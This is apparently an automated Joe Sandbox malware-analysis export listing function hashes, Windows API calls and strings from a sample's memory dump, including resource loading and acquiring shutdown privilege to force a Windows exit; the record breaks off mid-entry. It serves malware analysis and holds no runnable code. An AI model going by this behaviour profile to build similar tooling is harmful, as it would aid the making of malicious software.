                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: c77c7c59a7e7b7e8ff147d278546922070322993765875e56285c89c3d984c0e
                                                                                  • Instruction ID: 16a4501794763894d112e8f61db517d820fca643a48b443a7e05d48f47cfc21a
                                                                                  • Opcode Fuzzy Hash: c77c7c59a7e7b7e8ff147d278546922070322993765875e56285c89c3d984c0e
                                                                                  • Instruction Fuzzy Hash: B501A7726443144BC310AF28DDC092A77D5DB85364F19497ED985B73A2D33B6C0587EC
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: d42d089684133b81a88fd5b34fa30e5251bd9719128f8d3d92867c98b758b2aa
                                                                                  • Instruction ID: d65fcaada369784ca2bdba75972d6841df2d4c36370efdd9972facd22c063e35
                                                                                  • Opcode Fuzzy Hash: d42d089684133b81a88fd5b34fa30e5251bd9719128f8d3d92867c98b758b2aa
                                                                                  • Instruction Fuzzy Hash: 5BD05E91B00A6017E315E6BE4D8865692C85F88685B08843AFA84EB3D6D67CAC019399
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407C7D), ref: 00407B5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: bbebfbd3f2e0ee76b194d8dca6bfc3418916f620836008a8be59738a7b03f453
                                                                                  • Instruction ID: 18dba634c8603e3bfd9e31e0fd9e9e0dfc9111790600dff3e5d7eb84770668f2
                                                                                  • Opcode Fuzzy Hash: bbebfbd3f2e0ee76b194d8dca6bfc3418916f620836008a8be59738a7b03f453
                                                                                  • Instruction Fuzzy Hash: 9BD09EB1B102005FDB94CF794CC1B0336D47B08604B1144766908DB286E678E5108B58
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 00409097
                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040909D
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004090B9
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004090E0
                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004090E5
                                                                                    • Part of subcall function 00409068: MessageBoxA.USER32(00000000,00000000,00000000,00000030), ref: 00409082
                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004090F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupMessageOpenPrivilegePrivilegesValueWindows
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  • API String ID: 93195177-3733053543
                                                                                  • Opcode ID: b73fcc68baca4d043fd00cc533fb8e75f7a01c3a9c60f740979e53373edd7344
                                                                                  • Instruction ID: 0695c2ebd2eb84a1d084d689068080b93d2ee4c487913197a8968825d5ad4249
                                                                                  • Opcode Fuzzy Hash: b73fcc68baca4d043fd00cc533fb8e75f7a01c3a9c60f740979e53373edd7344
                                                                                  • Instruction Fuzzy Hash: 93F012B074430175F610BAB28D4BF6B269C5B80B08F50453FBA44B91C3DBBD9D08866F
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 004097A6
                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00409891,00000000,00409E2E,?,00000001,00000000,00000002,00000000,00409E50,?,00000000,00409E9A), ref: 004097B9
                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409891,00000000,00409E2E,?,00000001,00000000,00000002,00000000,00409E50,?,00000000), ref: 004097CB
                                                                                  • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409891,00000000,00409E2E,?,00000001,00000000,00000002,00000000,00409E50), ref: 004097DC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: 7b316bc7c1b879fa348e3aa9b243cb51400abe78db8018b99a6c2f0285be2413
                                                                                  • Instruction ID: a18d5d3294111a03e7d3f4974878e862fe029eec91856e7c66687738eca38d4d
                                                                                  • Opcode Fuzzy Hash: 7b316bc7c1b879fa348e3aa9b243cb51400abe78db8018b99a6c2f0285be2413
                                                                                  • Instruction Fuzzy Hash: 4AE07EA135570265EA913AF708C2B2A124C4BA471DF00083BB7087A2C3EEBDCC04812E
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053A2,?,?,?,00000000,00405554), ref: 004051B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                                  • Instruction ID: d1c3c8cc32c29ff76a6316e8efa709f16a180f2233bd89a38df216bc1ecc882f
                                                                                  • Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                                  • Instruction Fuzzy Hash: D4D05E7671D2503AE210515A2D85FBB4EACCAC57A4F10483ABA58DB242D2248C0697B6
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: SystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 2656138-0
                                                                                  • Opcode ID: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
                                                                                  • Instruction ID: 2fd9a68c0dbde603d2fbf043753412ebb29498d380aade495149b20e3fa82795
                                                                                  • Opcode Fuzzy Hash: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
                                                                                  • Instruction Fuzzy Hash: 4FE04F21E0010A42C704ABA5CD435FDF7AEEB95600B044172A418E92E0F631C251C788
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32(?,00406538,00000000,00406546,?,?,?,?,?,00409810), ref: 00405C4A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: eeaaa60a324c378a970959eeade0053f22dbcecc9127e5cc04352e8b2c130e7c
                                                                                  • Instruction ID: 512ddf82cb46fa63358223f3c28169a384cdafbe6d95bffbce184a852aeab1bf
                                                                                  • Opcode Fuzzy Hash: eeaaa60a324c378a970959eeade0053f22dbcecc9127e5cc04352e8b2c130e7c
                                                                                  • Instruction Fuzzy Hash: 82C08CB08047018BE310AF71DC02F1A32D4AB48310F840539A9F8E23C2EB3C84528FAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
                                                                                  • Instruction ID: accfb9e2d0aef03bd09a54c80f61bf31325f53db7a6ad457a175ac91117f224a
                                                                                  • Opcode Fuzzy Hash: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
                                                                                  • Instruction Fuzzy Hash: 9E222B75E04219CFCB04CF98C980AEEBBB2FF88314F24456AD855B7385DB39A942CB55
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00406EF9,?,0040BDC8), ref: 00406E1D
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406E23
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00406EF9,?,0040BDC8), ref: 00406E71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                  • API String ID: 4190037839-2401316094
                                                                                  • Opcode ID: cc3047d49297e76171d0c06fa89ce6d3e9c878228186e7a9c52d14aad021214c
                                                                                  • Instruction ID: 143a9aa2ced6d8b648d4f35142ff70c862837db5748c0f2ed76032457de4e4e2
                                                                                  • Opcode Fuzzy Hash: cc3047d49297e76171d0c06fa89ce6d3e9c878228186e7a9c52d14aad021214c
                                                                                  • Instruction Fuzzy Hash: 2A216174A00309ABDB00EAB5DC45B9F77B8AB44304F62447BB501F72C1EB7C9A21975C
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                  • String ID:
                                                                                  • API String ID: 1694776339-0
                                                                                  • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                  • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                  • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                  • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0040B41C,00000000,00401AB4), ref: 00401A09
                                                                                  • LocalFree.KERNEL32(00440938,00000000,00401AB4), ref: 00401A1B
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00440938,00000000,00401AB4), ref: 00401A3A
                                                                                  • LocalFree.KERNEL32(00441938,?,00000000,00008000,00440938,00000000,00401AB4), ref: 00401A79
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AA4
                                                                                  • RtlDeleteCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AAE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                  • String ID: 8D
                                                                                  • API String ID: 3782394904-1967805434
                                                                                  • Opcode ID: fa6f73d97100489e6f8e0fd8de51c0da6dee081bd34601f2e71cac440aaae270
                                                                                  • Instruction ID: b0c8d0c63b49c6aaabe66432ff64a941bd842da83dadee4e543dc85868b8677d
                                                                                  • Opcode Fuzzy Hash: fa6f73d97100489e6f8e0fd8de51c0da6dee081bd34601f2e71cac440aaae270
                                                                                  • Instruction Fuzzy Hash: FD1130707823809ADB11ABA59EC6F523668D745B08F44447EF444BA3F3C77C9950CAAD
                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00405554,?,?,?,?,00000000,00000000,00000000,?,00406533,00000000,00406546), ref: 00405326
                                                                                    • Part of subcall function 00405154: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,0040521F,?,00000000,004052FE), ref: 00405172
                                                                                    • Part of subcall function 004051A0: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053A2,?,?,?,00000000,00405554), ref: 004051B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                  • API String ID: 1044490935-665933166
                                                                                  • Opcode ID: 69eaa329806e261e3ea2bd6a905f805444bbd7175d622747a2115ca183ebcdab
                                                                                  • Instruction ID: c09e13315f171a12985dbdb464a59e237450986582a28ced850c2d3c1f6cc62d
                                                                                  • Opcode Fuzzy Hash: 69eaa329806e261e3ea2bd6a905f805444bbd7175d622747a2115ca183ebcdab
                                                                                  • Instruction Fuzzy Hash: 6F512C34B00548ABDB00EBA59C91B8F776ADB88304F50847BA515BF3C6CA3DDA058B5C
                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                  • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitMessageProcess
                                                                                  • String ID: Error$Runtime error at 00000000$9@
                                                                                  • API String ID: 1220098344-1503883590
                                                                                  • Opcode ID: 14bb122ec9e708ace96d23b96e88ec5196aa73079570fb21bcae5e5db21d2f96
                                                                                  • Instruction ID: 701bbb02a83473d85132f94e2533bba1f7461556c6a4fb68b28f8d2334d2e0db
                                                                                  • Opcode Fuzzy Hash: 14bb122ec9e708ace96d23b96e88ec5196aa73079570fb21bcae5e5db21d2f96
                                                                                  • Instruction Fuzzy Hash: C621F530A143454AE710EF259A457163E98DB8A309F04817BE110BB3E3D77C8B49C7EE
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.KERNEL32(0040B41C,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040192E
                                                                                  • RtlEnterCriticalSection.KERNEL32(0040B41C,0040B41C,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 00401941
                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040B41C,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040196B
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040B41C,004019D5,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 004019C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                  • String ID: 8D
                                                                                  • API String ID: 730355536-1967805434
                                                                                  • Opcode ID: efe3f14c18cbdae779f247eede24122882e3cbbff20fedca29629a7a8acf4ae3
                                                                                  • Instruction ID: 1fbc517603835383e1336f1caa5f3efd636d2a280deaa4dd4e997cee02ce5fac
                                                                                  • Opcode Fuzzy Hash: efe3f14c18cbdae779f247eede24122882e3cbbff20fedca29629a7a8acf4ae3
                                                                                  • Instruction Fuzzy Hash: 2B016DB0A843409EE715AB6A9A56B263AA4D785B04F1484BFF050FA3F3C77C4550C7DD
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 262959230-0
                                                                                  • Opcode ID: 7861e2075242f2531d6a988cddbdcf790bf602f232810e911d39663b5bcfd070
                                                                                  • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                  • Opcode Fuzzy Hash: 7861e2075242f2531d6a988cddbdcf790bf602f232810e911d39663b5bcfd070
                                                                                  • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00409806), ref: 004030E3
                                                                                  • GetCommandLineA.KERNEL32(00000000,00409806), ref: 004030EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandHandleLineModule
                                                                                  • String ID: U1hd.@$%B
                                                                                  • API String ID: 2123368496-3806291514
                                                                                  • Opcode ID: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
                                                                                  • Instruction ID: fc6106ec3918557feb9e8595d18864a5322139aa66bf0d8c86619f258e517ec6
                                                                                  • Opcode Fuzzy Hash: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
                                                                                  • Instruction Fuzzy Hash: 04C002745413408AD76CAFB69E4A70A3994E785309F40883FA218BE3F1DB7C4605ABDD
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0040B41C,00000000,00402148), ref: 00402017
                                                                                    • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040B41C,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040192E
                                                                                    • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040B41C,0040B41C,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 00401941
                                                                                    • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040B41C,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040196B
                                                                                    • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040B41C,004019D5,00000000,004019CE,?,?,0040217A,02080000,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 004019C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
